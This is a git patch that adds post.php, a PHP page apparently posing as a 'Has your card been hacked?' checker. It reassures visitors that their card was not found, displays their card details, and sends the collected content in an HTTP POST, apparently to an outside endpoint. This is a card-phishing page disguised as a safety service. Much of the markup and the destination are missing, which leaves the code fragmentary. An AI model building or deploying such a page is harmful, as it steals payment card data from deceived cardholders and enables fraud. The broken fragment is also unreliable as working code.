From c90d16a3ad5eab7d93e2da7fb3669be11a316d95 Mon Sep 17 00:00:00 2001 From: chud Date: Sun, 4 Aug 2024 14:16:28 +0200 Subject: [PATCH] Add post.php --- post.php | 55 +++++++++++++++++++++++++++++++++++++++++++++++++++++++ 1 file changed, 55 insertions(+) create mode 100644 post.php diff --git a/post.php b/post.php new file mode 100644 index 0000000..254d1ae --- /dev/null +++ b/post.php @@ -0,0 +1,55 @@ + + + + + + Has your card been hacked? + + + +

You're lucky, we didn't find it. Your card details:

+ + + + + [ + 'method' => 'POST', + 'header' => 'Content-Type: text/plain', + 'content' => $content + ] +])); ?> + +